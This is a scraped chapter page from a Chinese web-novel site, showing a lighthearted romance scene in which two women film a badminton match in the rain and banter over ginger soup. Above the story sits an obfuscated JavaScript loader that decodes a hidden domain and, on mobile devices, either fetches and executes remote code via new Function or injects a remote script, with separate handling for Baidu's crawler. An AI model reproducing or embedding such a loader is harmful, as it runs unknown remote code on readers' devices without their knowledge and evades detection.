98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(22(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

接下来宋若打得就比较顺畅了。与岑香香有来有往,互相完爆。

时旌喊了一声卡看看天,和两人说道刚那条不错,可能要下雨了,抓紧再走一条。

宋若的妆有些花了,到旁边补妆,用眼角的余光看一眼孟璟和她的小娇妻,那两人站得很近,也都齐刷刷地朝她这边望着。她闭上眼,专心接受造型师的侍弄。

时旌仿佛言灵似的,这一次才刚开拍,淅淅沥沥的小雨就下来了。导演助理小付心疼两个女孩子,试探性地问导演,要不看到时旌凝重的神色,识相地把剩下的话咽回了肚子里。时旌其实对这场雨的到来感到庆幸。下雨更有助于这场战斗的白热化。两个女孩子在雨地里交锋,青春气息喷涌而出,两人的球衣上也蹭上了泥渍,可谁也没在意,只是一次比一次更尽全力地挥着拍子。

周遭的人全部看得屏息敛神。

孟璟本来也可以好好欣赏这一场,可是想到上次自己击剑完毕淋了雨,回家烧得人事不知,自己的体格尚且这样,小药瓶子那么娇弱,待会儿还得了?因此心下着急,再也无心看球,眼角的余光偶然瞥到身旁静静站立的秦萌,焦躁的情绪突然出现一个断点。

秦萌看得比任何人都还要认真,身上轻飘飘的二次元萌感消失不见,整个人完全安静,仿佛场上那场球对她来说,要多重要有多重要。

孟璟皱眉推推她肩膀,喂了一声。

秦萌突然惊醒似的,看看她,舒口气,目光又回到宋若身上,轻声说她真努力。

孟璟点头赞同是个爱死磕的直脑筋。她当然可以请时旌不要让未婚妻冒雨拍摄,但她有种很强烈的直觉,未婚妻对她干涉自己的工作是存在微词的,上次那个叫明威的在片场骚扰她,她事后只是和人打了声招呼,让明威注意点。那天放了学回家,未婚妻就是一副有千言万语要说的样子,问是你吗?明威,是不是你?

场上传来一声娇叱,孟璟循声望过去,只见宋若将球击至对手那边,对手啊了一声,接球未遂,反而脱力将拍子甩了出去,人也跌坐在地上。时旌声如洪钟喊了一声cut!她看见小小的未婚妻奔到对面,将人从地上拉扯着扶了起来。两个人还友好地握了握手。

孟璟忽然笑出来。

宋若刚想问导演还要不要再走一条,肩就被人揽住了,老婆太厉害了。

宋若看看抹香鲸的侧脸,你

赶紧去洗个热水澡。孟璟不由分说,一手扶着她背心,将她往酒店方向带。一面回头对时旌说人我带走了啊。

时旌揉揉一头乱发,接过助理手中的小伞,朝她笑得促狭小孟总~

苏小康送了把伞过来,孟璟接过了,想起来什么似的,扶着未婚妻的肩,将她带到犹自站住不动的谢琼跟前,笑道表姐,待会儿咱一辆车回去呗。

宋若木着脸,分别看看两个人,再看看一旁眨巴着大眼睛的小娇妻,内心的无力感一波接一波漫上来。这些大罗神仙,怎么惹不起,还躲不起呢?

康康,你带我表姐和这位去你屋休息一下。孟璟非常有主人翁意识。而她自己则十分顺理成章地,扶着宋若的肩回到了那间海景房,进门呜哇了一声好想念这里。

宋若一路心事重重,进门听见孟璟这句感叹,朝她看了一眼。

孟璟适才那副杀气腾腾的样子不见了,取而代之的,是一副不正经嘴脸舔着唇珠,脸上笑嘻嘻的老婆,我也淋雨了,你先洗,还是咱俩一起?

宋若理都不理,拿了换洗的衣服,进了浴室。

孟璟坐在椅子里,心里乐颠颠的,掏出手机捣鼓了几下。

宋若想着要和抹香鲸把某些话说开来,洗得就比往常快,出来之前还在里头用电吹风把头发吹干。一出来却愣了一愣。

孟璟正在门口接外卖,回头见了她,捧着手里那个小袋子走过来,呼哧呼哧地老婆来喝姜汤。

宋若接过了,低低道了声谢。

孟璟摸摸她的头,语气温软道老婆,借我件衣服穿呗。

反正也叫了几百次了,不差多这一次两次。

宋若放下姜汤,从衣柜里拿了一件长裙,递给抹香鲸。

孟璟洗澡的时候,她坐在外面,拿杯子倒了一些姜汤喝,剩下的留给娇弱的抹香鲸了。

因此孟璟一出来,眨巴着眼,接过未婚妻手里剩的汤,那副表情,仿佛那汤不是她自己买的,而是宋若守了七天七夜才炮制出来的什么宝贝仙丹,老婆,你对我太好了吧,那么一点点汤,你干嘛还分给我啊。

宋若额角抽搐了两下,快点喝。

孟璟很乖巧地喝一小口,哈呼哈呼两声好辣啊。

宋若抹香鲸看见她无语,勾着嘴角一笑,这才捧起来,咕嘟咕嘟喝掉了。

宋若在她对面坐下,挽了挽头发,孟璟,我们谈谈。

谈什么?抹香鲸两只脚缩到椅子上,两只手撑在两腿中间,又像只狗狗的形容了,脸上则不怀好意地笑着,谈恋爱嘛?

你能不能正经点?宋若有点愤怒。这头大鲸鱼简直不可原谅,带着小娇妻四处跑,耀武扬威就算了,还在自己面前这样乱撩。原著里估计是有原主做傻傻的观众,那两人才狠狠地幸福了一把。这回她这个本该拈酸吃醋的第三者回避了,那两人就不适应,所以秀恩爱秀到她眼前来了?还怕她不够在意,所以抹香鲸还对她施展一些不可告人的勾引之术?

宋若为自己内心的想法而难受。

因为这太阴谋论了。

而抹香鲸看起来,是那样单纯的一条鱼。

孟璟手脚放端正,坐得像个认真听讲的小学生,清了清嗓子,可以谈呀,但是老婆能不能先帮我吹吹头发?说着,捋了捋肩上湿漉漉的散发。

宋若皱着眉你自己不会吹吗。

我今天训练太卖力了,没力气了。为了增加自己言语的可信度似的,往后一躺,做出一副有气无力的样子。

宋若本来是最温厚的那一类性情,但是面对这滑不溜秋的抹香鲸,几次三番被噎得说不出话来,这时脸上是一副你骗鬼呢的表情,抿着嘴不动。

我说老婆。孟璟邪邪一笑,你最好快一点,不然我在你房间待得太久,你我是心知肚明啦,但是别人还指不定会想什么呢,还以为咱们大白天的就

宋若不等她说完,随手抄起身后一个小抱枕就朝她扔了过去,砸得她嗷呜了一声。

孟璟接住了浅粉的海马抱枕,搂在胸前,从那上面露出眼睛来,可怜兮兮的眼神,瓮声瓮气说拜托嘛。

第29章 修罗场

她应该过不了多久就杀青了。一两个星期吧。苏小康将热茶递给谢琼,一副官方脸回答问题,不过今天你们大家还真是来得齐哈。

谢琼接过茶,还没有答言,从后面转出来一个声音这倒又放晴啦。天气真是多变。

两人回头,秦萌正擦着头发出来,左手也端了杯冒着热汽的饮品,眼睛微弯,人走到谢琼跟前,笑意更深些,问了句,表姐不擦擦头发么。

苏小康见两人有话要说的样子,接过秦萌的毛巾,转身走开。

他走了,留在阳台的两个人却又齐齐看着远处的海,各自喝茶。

谢琼是小口轻抿,秦萌喝起来则呼噜呼噜作响,赞叹哦一西。再喝了两口,仿佛是对远处扑棱棱乱飞的白色海鸟说可真乱。

谢琼扭头看了她一眼。

长发披散的女生转过脸,笑得毫无机心你说她们俩现在在干嘛呢。

雨停了,天是淡蓝色的,云朵叫斜阳镶上了金边,海风泛着凉爽。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间